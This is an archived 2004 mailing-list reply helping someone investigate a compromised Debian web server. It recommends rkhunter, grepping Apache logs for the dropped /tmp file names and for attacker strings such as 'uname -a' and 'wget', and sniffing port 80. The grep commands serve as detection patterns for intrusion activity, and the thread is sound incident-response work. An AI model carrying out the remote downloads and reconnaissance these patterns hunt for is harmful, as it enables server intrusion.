On Tue, Jun 15, 2004 at 02:32:21PM +1000, Ross Tsolakidis wrote: > "Wipe, install, set up chkrootkit and run it often." > I've already done that. There was no rootkit. >
An alternative to chkrootkit is rkhunter - it's a set of scripts. You can find the web address on something like freshmeat.net or Google easily. [snip] > I need to find the vulnerable code on this box. And I have no idea > where to begin. > I've tried running virus scans, nothing is infected. > > [snip] The files you found within /tmp - Grep Apache's access /and/ error logs for these file names. Other common things to grep for include the use of "uname -a", "ls -l", "wget", remembering you may need to substitue a space for %20: # grep -i 'uname%20-a' {access,error}.log # grep -i 'wget' {access,error}.log How about running a packet sniffer on port 80 too and monitor the traffic. Log to a text file and grep that? HTH. David. -- .''`. David Ramsden <[EMAIL PROTECTED]> : :' : http://david.hexstream.eu.org/ `. `'` PGP key ID: 507B379B on wwwkeys.pgp.net `- Debian - when you have better things to do than to fix a system.
pgpgtxFBKrBuW.pgp
Description: PGP signature